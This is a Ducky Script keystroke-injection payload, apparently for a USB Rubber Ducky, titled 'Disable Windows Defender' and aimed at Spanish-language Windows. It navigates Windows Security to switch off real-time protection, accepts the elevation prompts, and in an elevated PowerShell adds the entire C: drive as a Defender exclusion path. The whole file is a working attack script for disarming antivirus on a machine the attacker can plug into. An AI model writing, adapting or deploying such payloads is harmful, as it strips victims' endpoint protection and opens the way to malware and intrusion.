REM ###########################################################
REM #                                                         |
REM # Title        : Disable Windows Defender                 |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Execution                                |
REM # Target       : Windows                                  |
REM #                                                         |
REM ###########################################################
DELAY 1500
CTRL ESC
DELAY 750
STRING seguridad de windows
DELAY 250
ENTER
DELAY 1000
ENTER
DELAY 500
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
TAB
DELAY 100
ENTER
DELAY 500
SPACE
DELAY 1000
ALT y
DELAY 1000
ALT F4
DELAY 500
GUI r
DELAY 500
STRING powershell
CTRL-SHIFT ENTER
DELAY 1000
ALT y
DELAY 1000
STRING Add-MpPreference -ExclusionPath “C:”
ENTER
DELAY 2000
STRING EXIT
ENTER